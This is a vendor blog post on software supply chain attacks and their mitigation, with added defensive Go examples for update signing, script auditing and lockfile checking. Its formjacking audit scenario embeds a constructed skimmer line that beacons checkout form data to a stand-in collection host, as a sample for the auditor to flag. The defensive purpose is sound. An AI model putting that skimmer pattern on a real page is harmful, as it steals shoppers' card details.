Dr. Eduardo Rocha, Senior Solutions Engineer & Security Analyst @ GlobalDots
09.05.2022
5 Min read

Software supply chain security is an enormous concern for businesses today. According to Argon Security's 2021 report, software supply chain attacks tripled in 2021 compared with the previous year.

The constant race to ship faster while delivering a richer user experience adds dependencies, tooling and integration points to the supply chain, and each one is a place where something can be tampered with. Cybercriminals exploit these weak points and keep finding new ways to do so.

As a result, supply chain attacks keep evolving, and organizations need to understand where the risk sits and how to mitigate it.

How to Tell Whether Your Business Needs Supply Chain Security

Orchestrating a supply chain attack takes sophistication and time. Attackers invest in such attacks anyway because a single success can reach across many organizations at once.

Modern software is not built from the ground up. Most products pull in third-party vendors, APIs and libraries, and a build and delivery pipeline assembles them. An attacker who can tamper with any of those inputs, or with the pipeline itself, can plant code that every downstream build inherits.

For example, an attacker compromises a library published by a vendor or an open-source project. Every organization that builds with that library then ships the embedded malicious code to its own end users. A popular library may be in use across hundreds or thousands of organizations, so a single manipulated library corrupts many products. Supply chain attacks have disrupted industries such as shipping, financial services and healthcare, and they have been used for cyber espionage against government agencies.

Any organization with external dependencies is exposed to supply chain attacks. Attackers favor this kind of attack because a single entry point lets them reach many organizations and products, and the compromised organization's own reputation carries the malicious code to unsuspecting customers.

Types of Supply Chain Attacks

Attackers have developed several ways to take advantage of supply chain weaknesses. Here are some of the standard techniques:

Exploiting Open-Source and Third-Party Code for RCE: Attackers look for ways to insert malicious code into open-source and vendor libraries, for example by taking over a maintainer's account or publishing a look-alike package. The corrupted library behaves like the original, so nothing looks wrong at build time. Once it runs inside a victim's product, it gives the attacker remote code execution (RCE) on that system and a way to steal or destroy data.

Stolen Code-Signing Certificates to Spoof Updates: Code-signing certificates let users verify the integrity and authorship of code. An attacker who obtains a reputable vendor's signing key and certificate can sign fake updates and feed them into the software supply chain. Because the signature is genuine, users and update clients cannot distinguish the counterfeit update from a real one, and the final product is corrupted. A valid signature proves only that the key signed the code, not that the key was still in legitimate hands, which is why key revocation and rollback protection matter as much as the signature check itself.
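To make the stolen-key problem concrete, here is an added example (not code from the original article or from any vendor's updater) of the client side of a signed-update check. It uses Ed25519 from Go's standard library, a hypothetical manifest format, and a constructed revocation list; the key type, manifest layout and artifact bytes are all assumptions for illustration. It walks through a genuine update, an artifact swapped in transit, and a fake update signed with the stolen key before and after the publisher revokes it.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"encoding/hex"
	"errors"
	"fmt"
)

// Manifest is a hypothetical update manifest, not any vendor's real format.
// The publisher signs the artifact digest together with a monotonic sequence
// number, and the client checks the signature against a key pinned at install.
type Manifest struct {
	Seq    uint64   // monotonic update counter, used for rollback protection
	Digest [32]byte // SHA-256 of the update artifact
	Sig    []byte   // Ed25519 signature over Seq || Digest
}

var (
	ErrRevokedKey     = errors.New("publisher key has been revoked")
	ErrBadSignature   = errors.New("signature does not verify against pinned key")
	ErrDigestMismatch = errors.New("artifact digest does not match signed manifest")
	ErrRollback       = errors.New("manifest is not newer than the installed update")
)

// signedBytes is the exact byte string that is signed and verified.
func signedBytes(seq uint64, digest [32]byte) []byte {
	b := make([]byte, 8, 8+len(digest))
	binary.BigEndian.PutUint64(b, seq)
	return append(b, digest[:]...)
}

// KeyID is a short key fingerprint, the kind of value a revocation list carries.
func KeyID(pub ed25519.PublicKey) string {
	sum := sha256.Sum256(pub)
	return hex.EncodeToString(sum[:8])
}

// Sign is the publisher side, or an attacker holding a stolen private key.
func Sign(priv ed25519.PrivateKey, seq uint64, artifact []byte) Manifest {
	d := sha256.Sum256(artifact)
	return Manifest{Seq: seq, Digest: d, Sig: ed25519.Sign(priv, signedBytes(seq, d))}
}

// Verify is the client side. revoked holds key IDs the publisher has announced
// as compromised; installedSeq is the sequence number of the running version.
func Verify(pinned ed25519.PublicKey, revoked map[string]bool, installedSeq uint64, m Manifest, artifact []byte) error {
	if revoked[KeyID(pinned)] {
		return ErrRevokedKey // checked first: a valid signature from a stolen key is worthless
	}
	if !ed25519.Verify(pinned, signedBytes(m.Seq, m.Digest), m.Sig) {
		return ErrBadSignature
	}
	if sha256.Sum256(artifact) != m.Digest {
		return ErrDigestMismatch // manifest is genuine, the bytes are not
	}
	if m.Seq <= installedSeq {
		return ErrRollback // stops replay of an older, vulnerable but validly signed update
	}
	return nil
}

// Scenario walks through the attack described in the text and returns the
// four verification results in order: genuine update, tampered artifact,
// fake update signed with the stolen key, same fake update after revocation.
func Scenario() [4]error {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	revoked := map[string]bool{}
	const installed = 41
	genuine := []byte("update-42: constructed artifact bytes")
	m := Sign(priv, 42, genuine)

	var out [4]error
	out[0] = Verify(pub, revoked, installed, m, genuine)
	// Artifact swapped in transit: signature still valid, digest is not.
	out[1] = Verify(pub, revoked, installed, m, []byte("update-42: trojanised bytes"))
	// Stolen key: the attacker signs malware with the real key, so the
	// signature check alone cannot tell it from a genuine release.
	trojan := []byte("update-43: constructed backdoor bytes")
	fake := Sign(priv, 43, trojan)
	out[2] = Verify(pub, revoked, installed, fake, trojan)
	// Only once the publisher revokes the key does the client reject it.
	revoked[KeyID(pub)] = true
	out[3] = Verify(pub, revoked, installed, fake, trojan)
	return out
}

func main() {
	for i, err := range Scenario() {
		fmt.Printf("check %d: %v\n", i, err)
	}
}
```

The third result is the uncomfortable one: the fake update verifies cleanly, because the signature really was made with the publisher's key. Nothing on the client can detect that until the publisher distributes a revocation, which is why a real updater also needs a trustworthy channel for revocations and a transparency log or second signer to limit what one stolen key can do.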

Compromised Identity and Access Management to Enter Systems: Maintaining passwords and network security is a high priority for organizations. However, employees often use weak or reused passwords that attackers can crack or buy, and lax offboarding and auditing leave the accounts of former employees open. Attackers use these identity and access management weaknesses to get into source repositories, build systems and deployment pipelines and insert malicious code into the software supply chain.

Formjacking: In a formjacking attack, cybercriminals inject malicious JavaScript into a website's payment or sign-up form, typically through a compromised third-party script or the site's own page template. When a user enters personal information such as card details, phone number and address, the injected script copies it and sends it to a server the attackers control, while the form still submits normally. The collected data is used for fraud and identity theft. This kind of client-side attack can go undetected for a long time, because the theft happens in the visitor's browser and the company's servers see nothing unusual without proper monitoring. You can learn more about how to prevent formjacking from GlobalDots' webinar "Crush Formjacking – Ensuring Website Protection and PCI Compliance."
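Because the skimmer runs in the browser, the first line of defense is controlling which scripts a payment page may load. The following added example (not from the article or the webinar) audits a constructed checkout page: it reports inline scripts, third-party scripts whose origin is not on an allowlist, and third-party scripts that lack a Subresource Integrity (SRI) attribute, and it shows how the SRI value for a script file is computed. All hostnames, the page HTML and the script contents are constructed for illustration.

```go
package main

import (
	"crypto/sha512"
	"encoding/base64"
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// ScriptFinding is one script the page should not be loading, or is loading
// without integrity protection.
type ScriptFinding struct{ Script, Problem string }

var (
	scriptTag = regexp.MustCompile(`(?is)<script\b([^>]*)>(.*?)</script>`)
	attrRe    = regexp.MustCompile(`(?i)\b(src|integrity)\s*=\s*["']([^"']*)["']`)
)

// SRIHash returns the Subresource Integrity value for a script file, so the
// tag can be written as <script src=... integrity="sha384-..."> and the
// browser refuses any copy whose bytes differ from the one that was reviewed.
func SRIHash(content []byte) string {
	sum := sha512.Sum384(content)
	return "sha384-" + base64.StdEncoding.EncodeToString(sum[:])
}

// originOf returns scheme://host for an absolute URL, or "" for a relative
// URL, which is served by the page's own origin.
func originOf(src string) string {
	u, err := url.Parse(src)
	if err != nil || u.Host == "" {
		return ""
	}
	scheme := u.Scheme
	if scheme == "" {
		scheme = "https" // protocol-relative "//host/path"
	}
	return scheme + "://" + u.Host
}

// AuditScripts lists every <script> on the page and checks it against the
// third-party origins the page owner has approved. Inline scripts are
// reported because an injected skimmer is usually inline; external scripts
// from other origins must be allowlisted and carry an integrity attribute.
// A regexp is enough for a demo; use a real HTML parser on production pages.
func AuditScripts(page string, allowedOrigins map[string]bool) []ScriptFinding {
	var out []ScriptFinding
	for _, m := range scriptTag.FindAllStringSubmatch(page, -1) {
		var src, integrity string
		for _, a := range attrRe.FindAllStringSubmatch(m[1], -1) {
			if strings.EqualFold(a[1], "src") {
				src = a[2]
			} else {
				integrity = a[2]
			}
		}
		if src == "" {
			body := strings.Join(strings.Fields(m[2]), " ")
			if len(body) > 48 {
				body = body[:48] + "..."
			}
			out = append(out, ScriptFinding{body, "inline script: cannot be covered by SRI, review it or move it to a hashed file"})
			continue
		}
		origin := originOf(src)
		if origin == "" {
			continue // first-party script served with the page itself
		}
		if !allowedOrigins[origin] {
			out = append(out, ScriptFinding{src, "third-party origin " + origin + " is not on the allowlist"})
		}
		if integrity == "" {
			out = append(out, ScriptFinding{src, "no integrity attribute: a modified file on that host would load unchanged"})
		}
	}
	return out
}

// Scenario audits a constructed checkout page (hypothetical hosts, not real
// sites). The payment SDK is allowlisted and pinned; the analytics tag is
// allowlisted but unpinned; an unknown CDN script and an inline submit hook
// that beacons the form elsewhere are the kind of additions formjacking leaves.
func Scenario() []ScriptFinding {
	sdk := []byte("/* constructed payment SDK contents */ window.pay = function () {};")
	page := fmt.Sprintf(`<html><body>
<form id="checkout"><input name="card"><input name="cvv"></form>
<script src="/static/app.js"></script>
<script src="https://sdk.payments-example.com/v2/pay.js" integrity="%s" crossorigin="anonymous"></script>
<script src="https://analytics.example-vendor.com/tag.js"></script>
<script src="https://cdn.example-unknown.net/jquery.min.js"></script>
<script>
document.getElementById('checkout').addEventListener('submit', function (e) {
  navigator.sendBeacon('https://collect.example-unknown.net/c', new FormData(e.target));
});
</script>
</body></html>`, SRIHash(sdk))
	allowed := map[string]bool{
		"https://sdk.payments-example.com":     true,
		"https://analytics.example-vendor.com": true,
	}
	return AuditScripts(page, allowed)
}

func main() {
	for _, f := range Scenario() {
		fmt.Printf("%-60s %s\n", f.Script, f.Problem)
	}
}
```

Pair the allowlist with a Content-Security-Policy header that names the same origins (a `script-src` directive with `require-sri-for`-style hashing where supported), so the browser enforces at runtime what this audit checks offline.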

Recent Supply Chain Attack Examples

In recent years, supply chain attacks have become more sophisticated and far-reaching. Here are some examples:

SolarWinds Supply Chain Attack: In 2020, the highly publicized SolarWinds attack shook the cybersecurity industry. Attackers inserted a backdoor, later named SUNBURST, into a build of SolarWinds' Orion platform, and up to 18,000 customers downloaded the trojanized update. Affected organizations included companies such as Cisco, SAP, Intel, Deloitte and Microsoft, and US government bodies including NASA, the Justice Department and the State Department. SUNBURST profiled the infected host, beaconed to attacker-controlled domains and gave the attackers a foothold from which they deployed further tooling against selected targets.

Kaseya Supply Chain Ransomware Attack: In 2021, the Kaseya VSA remote monitoring and management tool became the vector for a supply chain ransomware attack by the Russia-linked REvil ransomware group. The attackers exploited vulnerabilities in VSA to push ransomware through it to the endpoints it managed. Roughly 50 of Kaseya's direct customers, many of them Managed Service Providers (MSPs), were hit, and between 800 and 1,500 downstream businesses were affected through those MSPs.

Cloudflare's cdnjs RCE Vulnerability: In 2021, a vulnerability in the library update server behind cdnjs, Cloudflare's free and open-source JavaScript CDN, created a remote code execution (RCE) risk on the infrastructure that publishes the 4,041 JavaScript and CSS libraries it hosts, and with it the ability to tamper with any of them. Read GlobalDots' cdnjs RCE report to learn more.

Log4j Vulnerability: In December 2021, a remote code execution vulnerability in Log4j (CVE-2021-44228, known as Log4Shell), a widely used open-source logging library for Java, created a software supply chain crisis: the flaw sat inside countless products whose owners did not know they shipped Log4j at all. Java runs on an estimated 3 billion devices, which gives a sense of the potential exposure. Read GlobalDots' Log4j exposure report to learn more.

Improving Your Supply Chain Security

Supply chain risk mitigation requires a multi-dimensional approach.

Monitor and Understand Your Supply Chain

You should have a clear picture of which components go into your product, at which versions and from which sources; a software bill of materials (SBOM) is the usual way to record this. Visibility into your software supply chain lets you spot weak points in the development pipeline, and a technology partner with the relevant knowledge and experience can help you pinpoint them.

Software Composition Analysis (SCA) for Supply Chain Vulnerabilities

You can use software composition analysis (SCA) tools such as Synopsys Black Duck, WhiteSource Diffend or Bytesafe to inventory the dependencies in your supply chain, match them against vulnerability databases and check that the artifacts you build from are the ones you expect.
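The core checks an SCA tool performs can be seen in a few dozen lines. The following added example (not code from the article or from any of the tools named) parses a lockfile in pip's hash-pinning syntax, compares each fetched artifact against its pinned SHA-256, flags entries that are not pinned to a version or a hash, and matches versions against an advisory list. The package names, artifact bytes and advisory data are all constructed for illustration, not real packages or real CVEs.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"sort"
	"strings"
)

// Dependency is one entry of a lockfile written in pip's hash-pinning
// syntax ("name==version --hash=sha256:<hex>"). The same check applies to
// package-lock.json "integrity" fields or go.sum lines.
type Dependency struct {
	Name, Version string   // Version is "" when the entry is not pinned with ==
	Hashes        []string // accepted SHA-256 digests (hex); empty means unpinned
}

// Finding is one problem the audit reports for a package.
type Finding struct{ Package, Problem string }

func sha256hex(b []byte) string {
	sum := sha256.Sum256(b)
	return hex.EncodeToString(sum[:])
}

// ParseLockfile reads the requirement lines; comments and blanks are skipped.
func ParseLockfile(text string) []Dependency {
	var deps []Dependency
	for _, line := range strings.Split(text, "\n") {
		line = strings.TrimSpace(line)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		fields := strings.Fields(line)
		spec := fields[0]
		var d Dependency
		if i := strings.IndexAny(spec, "<>=!~"); i >= 0 {
			d.Name = strings.ToLower(spec[:i])
			if strings.HasPrefix(spec[i:], "==") {
				d.Version = spec[i+2:]
			}
		} else {
			d.Name = strings.ToLower(spec) // bare name, no version at all
		}
		for _, f := range fields[1:] {
			if strings.HasPrefix(f, "--hash=sha256:") {
				d.Hashes = append(d.Hashes, strings.ToLower(strings.TrimPrefix(f, "--hash=sha256:")))
			}
		}
		deps = append(deps, d)
	}
	return deps
}

// Audit compares each entry with the artifact actually fetched and with a
// list of versions that have a known advisory. Every problem becomes a
// Finding; an empty result means the set is pinned, intact and advisory-free.
func Audit(deps []Dependency, fetched map[string][]byte, advisories map[string][]string) []Finding {
	var out []Finding
	add := func(d Dependency, format string, a ...interface{}) {
		out = append(out, Finding{d.Name, fmt.Sprintf(format, a...)})
	}
	for _, d := range deps {
		if d.Version == "" {
			add(d, "not pinned to an exact version; a resolver may pick a newer, tampered release")
		}
		if len(d.Hashes) == 0 {
			add(d, "no --hash pin; any artifact the index serves for this version is accepted")
		}
		if art, ok := fetched[d.Name]; !ok {
			add(d, "no artifact fetched")
		} else if len(d.Hashes) > 0 {
			got := sha256hex(art)
			matched := false
			for _, h := range d.Hashes {
				if h == got {
					matched = true
				}
			}
			if !matched {
				add(d, "fetched artifact sha256 %s... is not in the pinned set", got[:12])
			}
		}
		for _, v := range advisories[d.Name] {
			if v == d.Version {
				add(d, "version %s has a known advisory; upgrade before shipping", v)
			}
		}
	}
	sort.SliceStable(out, func(i, j int) bool { return out[i].Package < out[j].Package })
	return out
}

// Scenario builds a constructed lockfile and artifact set (not real packages)
// and audits it: acme-http is pinned and intact, acme-crypto is pinned but the
// fetched artifact was swapped, acme-log has no hash and a listed advisory.
func Scenario() []Finding {
	httpOK := []byte("acme-http-1.4.0 wheel (constructed bytes)")
	cryptoOrig := []byte("acme-crypto-3.2.1 wheel (constructed bytes)")
	cryptoSwapped := []byte("acme-crypto-3.2.1 wheel with injected payload")
	logLib := []byte("acme-log-2.14.1 wheel (constructed bytes)")

	lock := fmt.Sprintf(`# constructed lockfile
acme-http==1.4.0 --hash=sha256:%s
acme-crypto==3.2.1 --hash=sha256:%s
acme-log==2.14.1
`, sha256hex(httpOK), sha256hex(cryptoOrig))

	fetched := map[string][]byte{"acme-http": httpOK, "acme-crypto": cryptoSwapped, "acme-log": logLib}
	advisories := map[string][]string{"acme-log": {"2.14.1"}} // constructed advisory data
	return Audit(ParseLockfile(lock), fetched, advisories)
}

func main() {
	for _, f := range Scenario() {
		fmt.Printf("%-12s %s\n", f.Package, f.Problem)
	}
}
```

Run this in CI against the artifacts the build actually downloaded, not against the index's metadata: the hash mismatch on acme-crypto is exactly the case where the lockfile is correct but the thing served to the build is not.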

Supply Chain Threats Mean Data and Network Security Are Better Off Separated

Network security focuses on keeping the business running and protecting against attacks that stop operations. Data security focuses on keeping data from being stolen or destroyed. The two overlap, but treating them as separate disciplines with separate owners makes the supply chain more resilient: a malicious component that slips past the network controls still meets data controls that were designed on the assumption that it would.

IT can focus on keeping attackers out, while data security specialists make sure the data stays protected even when an attack succeeds, for example by encrypting data at rest with keys that a compromised component cannot reach.

To hear how it’s done in practice, check out our most recent talk on this topic: 

Privacy by Design – Why Data Privacy & Security Officers Must Collaborate

Protecting data with zero trust principles, and auditing vendors separately for how they handle your data, are considered the more robust forms of supply chain risk mitigation. Data is only valuable to cybercriminals if they can read it. If the data stays protected during a network breach, your supply chain is safer.

Broaden Your Technology Approach to Supply Chain Security Through Implementing SOC

For more robust supply chain protection, change how you protect your endpoints. Build, or subscribe to, a security operations center (SOC) to gain visibility into all the endpoints in your supply chain. Continuous monitoring of your network shows you where the organization is vulnerable, especially at the points where third-party software integrates with your own.

Conclusion

You cannot eliminate supply chain threats, but how your security architecture is built significantly affects your risk level. Separating data and network protection is an excellent idea when experts apply it so that the two work together seamlessly. A technology partner with a holistic view of your infrastructure is highly advised.

Are you having difficulty with your supply chain risk mitigation strategy? Contact GlobalDots to improve your supply chain security today.
